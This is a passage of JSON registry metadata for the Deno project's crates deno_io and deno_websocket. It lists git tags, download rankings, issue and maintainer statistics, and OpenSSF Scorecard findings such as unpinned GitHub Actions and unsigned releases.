denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-24T13:09:43.631Z","dependent_packages_count":5,"downloads":533754,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":7.6117355086861656,"dependent_repos_count":13.215541873214192,"dependent_packages_count":9.161404508706934,"stargazers_count":0.0022493308240798364,"forks_count":0.0577328244847158,"docker_downloads_count":6.765146970605879,"average":6.135635169420328},"purl":"pkg:cargo/deno_io","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_io","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_io","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_io/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T15:40:54.265Z","issues_count":6598,"pull_requests_count":9606,"avg_time_to_close_issue":17246074.663934425,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3780,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2464,"avg_comments_per_issue":2.5110639587753867,"avg_comments_per_pull_request":0.7159067249635644,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":662,"past_year_pull_requests_count":1182,"past_year_avg_time_to_close_issue":1381266.2837209303,"past_year_avg_time_to_close_pull_request":1332181.7239747634,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":634,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":371,"past_year_avg_comments_per_issue":1.20392749244713,"past_year_avg_comments_per_pull_request":1.0829103214890017,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":464,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1778,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":376,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-03-03T15:41:20.890Z","updated_at":"2023-03-03T15:41:20.890Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:30.199Z","updated_at":"2023-07-18T22:41:30.199Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047827,"name":"deno_websocket","ecosystem":"cargo","description":"Implementation of WebSocket API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":269,"first_release_published_at":"2021-01-06T16:08:36.635Z","latest_release_published_at":"2026-08-27T15:20:28.078Z","latest_release_number":"0.263.0","last_synced_at":"2026-09-07T22:58:21.002Z","created_at":"2022-04-12T10:02:41.278Z","updated_at":"2026-09-07T22:58:21.002Z","registry_url":"https://crates.io/crates/deno_websocket/","install_command":"cargo install deno_websocket","documentation_url":"https://docs.rs/deno_websocket/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using 